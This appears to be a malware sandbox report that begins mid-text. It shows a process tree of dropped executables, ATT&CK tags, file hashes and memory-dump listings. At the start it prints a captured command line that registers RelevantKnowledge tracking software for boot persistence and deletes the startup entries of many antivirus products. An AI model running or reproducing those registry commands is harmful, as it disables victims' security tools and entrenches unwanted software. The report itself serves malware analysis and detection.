"%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
4⤵
PID:4160

C:\Users\Admin\AppData\Local\Temp\B31B.exe
C:\Users\Admin\AppData\Local\Temp\B31B.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\SysWOW64\cmd.exe
cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
2⤵
- Drops startup file
PID:2168

C:\Users\Admin\AppData\Local\Temp\B464.exe
C:\Users\Admin\AppData\Local\Temp\B464.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444

C:\Users\Admin\AppData\Local\Temp\B464.exe
C:\Users\Admin\AppData\Local\Temp\B464.exe
2⤵
- Executes dropped EXE
PID:1188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 24
3⤵
- Program crash
PID:2124

C:\Users\Admin\AppData\Local\Temp\CB7.exe
C:\Users\Admin\AppData\Local\Temp\CB7.exe
1⤵
- Executes dropped EXE
PID:1972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 732
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 748
2⤵
- Program crash
PID:2232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 752
2⤵
- Program crash
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 892
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 880
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:340

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3908

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2000

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4392

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4464

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4704

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4948

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5112

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe
MD5
4710cad4ef7196e4cddb126e70e58094

SHA1
acce1f47d643fc630cddece0dfd5df493b963c91

SHA256
87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e

SHA512
2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
4710cad4ef7196e4cddb126e70e58094

SHA1
acce1f47d643fc630cddece0dfd5df493b963c91

SHA256
87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e

SHA512
2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
6bf0e5945fb9da68e1b03bdaed5f6f8d

SHA1
eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

SHA256
dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

SHA512
977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
474405855b22b5a6d16fbc0a52e774be

SHA1
9a93f54581b4c9e0858095bed947e7b854ae421b

SHA256
50afdb002221c6cf90b29f8f19df99a3e5bed23a0038744d484ce3403c0cb5aa

SHA512
55c67e864c02baf48a3049221324662b6aaac90536688bc996f4a11a4bab607fa5f5e4d0b4262c3858107d3b68d3661e564fd83965e1c8539d2935d79bed3bf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6a979601545afc0ee3dd3e94e3c069d7

SHA1
fc963550ebb939a9c7dc8ec341dd1846c0d8eecf

SHA256
03b50263dd49df24335c9062683548ffa6d1bcdcac3dd778ef7d8f235788ff6e

SHA512
6323b6623a0f9a06a3e8153ccdc3c265d04d7bca64dc6c1b1cc3d499be97ca2663921ebedee591664187f188e6561e012eaf34ce04da29378b564a0a7d9357bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD0E.exe
MD5
a69e12607d01237460808fa1709e5e86

SHA1
4a12f82aee1c90e70cdf6be863ce1a749c8ae411

SHA256
188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc

SHA512
7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD0E.exe
MD5
a69e12607d01237460808fa1709e5e86

SHA1
4a12f82aee1c90e70cdf6be863ce1a749c8ae411

SHA256
188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc

SHA512
7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0C8.exe
MD5
4710cad4ef7196e4cddb126e70e58094

SHA1
acce1f47d643fc630cddece0dfd5df493b963c91

SHA256
87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e

SHA512
2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0C8.exe
MD5
4710cad4ef7196e4cddb126e70e58094

SHA1
acce1f47d643fc630cddece0dfd5df493b963c91

SHA256
87d77f198d287a93f890bd8eaa311d5190655aa2d4023c5a957fc9653389b04e

SHA512
2a2b70ba42923c34691fc96d0323181d1004979c64ab792f834f6fe18a785f3a6476f969c780ebc8d2d81f1cbfd3f335bc0a4a7e3e74fa248afbb64f97655d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\B31B.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\B31B.exe
MD5
b19ac380411ed5d8b5a7e7e0c1da61a6

SHA1
9665c20336a5ce437bbf7b564370bfa43e99954c

SHA256
aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619

SHA512
73b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208

Download Submit
C:\Users\Admin\AppData\Local\Temp\B464.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\B464.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\B464.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\CB7.exe
MD5
6f1c3dfab2badbfccc465998474fd3e6

SHA1
a3bb8acc48e1d5e0f89e1f1d542db35252a26176

SHA256
3a3058d09218b1f26971c761309cbd818e5acccb7dfaa713674a846e1cbdfd33

SHA512
4d167c024540bc6c818351258c1bbd7af17f2b77cba3573dd9393a691fb3d3ff9697463d6fd25f5373c1e7607d3058765665be9878614bbec870a6b17d5bd4c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\CB7.exe
MD5
6f1c3dfab2badbfccc465998474fd3e6

SHA1
a3bb8acc48e1d5e0f89e1f1d542db35252a26176

SHA256
3a3058d09218b1f26971c761309cbd818e5acccb7dfaa713674a846e1cbdfd33

SHA512
4d167c024540bc6c818351258c1bbd7af17f2b77cba3573dd9393a691fb3d3ff9697463d6fd25f5373c1e7607d3058765665be9878614bbec870a6b17d5bd4c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat
MD5
c787a350c24be7a9a555159964e501ad

SHA1
f2e0c5eabb56a7b52c8034558ecd85cf7b6e8cce

SHA256
d56c41429b9dc66a2b474cb5888f99db6fdf15f4d585a671312c8330e62432de

SHA512
d41588905a38c25d5c556c6bbff6c8d345c8e2bcf739307aad365dde2b07a657353ce22deb668d729a8280dc820cff36fc46ae7246b944033fda610fda0589f5

Download Submit
memory/340-223-0x0000000002F50000-0x0000000002FBB000-memory.dmp

Filesize
428KB

Download
memory/340-216-0x0000000000000000-mapping.dmp

Download
memory/340-222-0x0000000003200000-0x0000000003274000-memory.dmp

Filesize
464KB

Download
memory/388-117-0x0000000000630000-0x0000000000646000-memory.dmp

Filesize
88KB

Download
memory/520-146-0x0000000000400000-0x0000000002C7C000-memory.dmp

Filesize
40.5MB

Download
memory/520-145-0x0000000002DB0000-0x0000000002DEB000-memory.dmp

Filesize
236KB

Download
memory/520-141-0x0000000000000000-mapping.dmp

Download
memory/904-118-0x0000000000000000-mapping.dmp

Download
memory/1188-194-0x000000000044003F-mapping.dmp

Download
memory/1188-193-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1836-159-0x0000000006D20000-0x0000000006D21000-memory.dmp

Filesize
4KB

Download
memory/1836-155-0x0000000007290000-0x0000000007291000-memory.dmp

Filesize
4KB

Download
memory/1836-164-0x0000000008220000-0x0000000008221000-memory.dmp

Filesize
4KB

Download
memory/1836-190-0x0000000006D23000-0x0000000006D24000-memory.dmp

Filesize
4KB

Download
memory/1836-148-0x0000000000000000-mapping.dmp

Download
memory/1836-151-0x0000000004680000-0x0000000004681000-memory.dmp

Filesize
4KB

Download
memory/1836-152-0x0000000007360000-0x0000000007361000-memory.dmp

Filesize
4KB

Download
memory/1836-153-0x0000000007010000-0x0000000007011000-memory.dmp

Filesize
4KB

Download
memory/1836-154-0x00000000071B0000-0x00000000071B1000-memory.dmp

Filesize
4KB

Download
memory/1836-169-0x0000000008F60000-0x0000000008F61000-memory.dmp

Filesize
4KB

Download
memory/1836-163-0x0000000007230000-0x0000000007231000-memory.dmp

Filesize
4KB

Download
memory/1836-158-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

Filesize
4KB

Download
memory/1836-171-0x0000000008EF0000-0x0000000008EF1000-memory.dmp

Filesize
4KB

Download
memory/1836-162-0x0000000006D90000-0x0000000006D91000-memory.dmp

Filesize
4KB

Download
memory/1836-160-0x0000000006D22000-0x0000000006D23000-memory.dmp

Filesize
4KB

Download
memory/1836-170-0x0000000008E80000-0x0000000008E81000-memory.dmp

Filesize
4KB

Download
memory/1972-224-0x0000000004860000-0x00000000048F1000-memory.dmp

Filesize
580KB

Download
memory/1972-211-0x0000000000000000-mapping.dmp

Download
memory/1972-232-0x0000000000400000-0x0000000002CA9000-memory.dmp

Filesize
40.7MB

Download
memory/2000-253-0x0000000003260000-0x0000000003267000-memory.dmp

Filesize
28KB

Download
memory/2000-255-0x0000000003250000-0x000000000325B000-memory.dmp

Filesize
44KB

Download
memory/2000-231-0x0000000000000000-mapping.dmp

Download
memory/2076-144-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/2076-157-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/2076-126-0x0000000000000000-mapping.dmp

Download
memory/2076-147-0x0000000005340000-0x0000000005551000-memory.dmp

Filesize
2.1MB

Download
memory/2076-140-0x00000000033B0000-0x00000000035F3000-memory.dmp

Filesize
2.3MB

Download
memory/2168-156-0x0000000000000000-mapping.dmp

Download
memory/2232-252-0x0000000000000000-mapping.dmp

Download
memory/2232-257-0x00000000008F0000-0x00000000008F9000-memory.dmp

Filesize
36KB

Download
memory/2232-258-0x00000000008E0000-0x00000000008EF000-memory.dmp

Filesize
60KB

Download
memory/2444-189-0x0000000005780000-0x00000000057A1000-memory.dmp

Filesize
132KB

Download
memory/2444-129-0x0000000000000000-mapping.dmp

Download
memory/2444-133-0x0000000000C40000-0x0000000000C41000-memory.dmp

Filesize
4KB

Download
memory/2444-135-0x0000000005B40000-0x0000000005B41000-memory.dmp

Filesize
4KB

Download
memory/2444-136-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/2444-137-0x0000000005740000-0x0000000005741000-memory.dmp

Filesize
4KB

Download
memory/2444-139-0x0000000005640000-0x0000000005B3E000-memory.dmp

Filesize
5.0MB

Download
memory/2580-204-0x0000000009760000-0x00000000098BB000-memory.dmp

Filesize
1.4MB

Download
memory/2580-188-0x0000000008290000-0x0000000008291000-memory.dmp

Filesize
4KB

Download
memory/2580-192-0x0000000006F42000-0x0000000006F43000-memory.dmp

Filesize
4KB

Download
memory/2580-191-0x0000000006F40000-0x0000000006F41000-memory.dmp

Filesize
4KB

Download
memory/2580-185-0x0000000007E00000-0x0000000007E01000-memory.dmp

Filesize
4KB

Download
memory/2580-176-0x0000000000000000-mapping.dmp

Download
memory/2580-201-0x0000000009DA0000-0x0000000009DA1000-memory.dmp

Filesize
4KB

Download
memory/2580-203-0x0000000006F43000-0x0000000006F44000-memory.dmp

Filesize
4KB

Download
memory/2624-115-0x0000000000402E1A-mapping.dmp

Download
memory/2624-114-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2932-212-0x00000000049A2000-0x00000000049A3000-memory.dmp

Filesize
4KB

Download
memory/2932-469-0x0000000006FC0000-0x0000000006FC1000-memory.dmp

Filesize
4KB

Download
memory/2932-205-0x0000000000000000-mapping.dmp

Download
memory/2932-238-0x00000000092B0000-0x00000000092E3000-memory.dmp

Filesize
204KB

Download
memory/2932-245-0x0000000009290000-0x0000000009291000-memory.dmp

Filesize
4KB

Download
memory/2932-250-0x0000000009670000-0x0000000009671000-memory.dmp

Filesize
4KB

Download
memory/2932-210-0x00000000049A0000-0x00000000049A1000-memory.dmp

Filesize
4KB

Download
memory/2932-259-0x000000007F0F0000-0x000000007F0F1000-memory.dmp

Filesize
4KB

Download
memory/2932-461-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

Filesize
4KB

Download
memory/2932-260-0x00000000049A3000-0x00000000049A4000-memory.dmp

Filesize
4KB

Download
memory/3836-138-0x0000000000400000-0x0000000002C7C000-memory.dmp

Filesize
40.5MB

Download
memory/3836-130-0x0000000002C80000-0x0000000002D2E000-memory.dmp

Filesize
696KB

Download
memory/3836-123-0x0000000000000000-mapping.dmp

Download
memory/3908-229-0x0000000000F00000-0x0000000000F07000-memory.dmp

Filesize
28KB

Download
memory/3908-116-0x0000000000030000-0x000000000003A000-memory.dmp

Filesize
40KB

Download
memory/3908-225-0x0000000000000000-mapping.dmp

Download
memory/3908-230-0x0000000000EF0000-0x0000000000EFC000-memory.dmp

Filesize
48KB

Download
memory/4160-491-0x0000000000000000-mapping.dmp

Download
memory/4392-326-0x0000000002FA0000-0x0000000002FA5000-memory.dmp

Filesize
20KB

Download
memory/4392-327-0x0000000002F90000-0x0000000002F99000-memory.dmp

Filesize
36KB

Download
memory/4392-323-0x0000000000000000-mapping.dmp

Download
memory/4464-332-0x0000000000000000-mapping.dmp

Download
memory/4464-333-0x0000000000410000-0x0000000000416000-memory.dmp

Filesize
24KB

Download
memory/4464-334-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4704-397-0x00000000005E0000-0x00000000005E9000-memory.dmp

Filesize
36KB

Download
memory/4704-395-0x00000000005F0000-0x00000000005F4000-memory.dmp

Filesize
16KB

Download
memory/4704-387-0x0000000000000000-mapping.dmp

Download
memory/4948-462-0x00000000005A0000-0x00000000005A5000-memory.dmp

Filesize
20KB

Download
memory/4948-465-0x0000000000590000-0x0000000000599000-memory.dmp

Filesize
36KB

Download
memory/4948-443-0x0000000000000000-mapping.dmp

Download
memory/5112-479-0x0000000000000000-mapping.dmp

Download
memory/5112-480-0x00000000009D0000-0x00000000009D5000-memory.dmp

Filesize
20KB

Download
memory/5112-481-0x00000000009C0000-0x00000000009C9000-memory.dmp

Filesize
36KB

Download